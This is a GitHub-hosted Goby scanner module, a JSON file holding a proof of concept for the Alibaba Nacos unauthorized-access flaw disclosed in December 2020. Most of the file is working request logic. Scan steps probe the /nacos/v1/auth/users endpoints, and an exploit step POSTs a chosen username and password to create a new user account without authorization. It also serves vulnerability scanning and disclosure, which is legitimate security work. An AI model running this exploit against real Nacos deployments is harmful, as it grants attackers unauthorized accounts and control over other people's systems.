-
Notifications
You must be signed in to change notification settings - Fork 8
/
Alibaba_Nacos_Add_user_not_authorized.json
126 lines (126 loc) · 4.41 KB
/
Alibaba_Nacos_Add_user_not_authorized.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
{
"Name": "Alibaba Nacos Add user not authorized",
"Level": "2",
"Tags": [
"Ultra vires"
],
"GobyQuery": "title==\"Nacos\"",
"Description": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.",
"Product": "Alibaba Nacos",
"Homepage": "https://github.com/alibaba/nacos",
"Author": "PeiQi",
"Impact": "<p>Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.<br></p>",
"Recommandation": "<p>Upgrade version<br></p>",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "User",
"type": "input",
"value": "PeiQi",
"show": ""
},
{
"name": "Pass",
"type": "input",
"value": "PeiQi",
"show": ""
},
{
"name": "Dir",
"type": "select",
"value": "/v1/auth/users,/nacos/v1/auth/users",
"show": ""
}
],
"ScanSteps": [
"OR",
{
"Request": {
"method": "GET",
"uri": "/nacos/v1/auth/users?",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/v1/auth/users?",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "{{{Dir}}}",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "username={{{User}}}&password={{{Pass}}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-04-04 19:56:49",
"GobyVersion": "1.8.255"
}